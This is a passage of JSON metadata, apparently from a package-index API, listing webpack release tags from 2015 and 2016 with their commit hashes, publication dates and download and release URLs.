ished_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a5201231820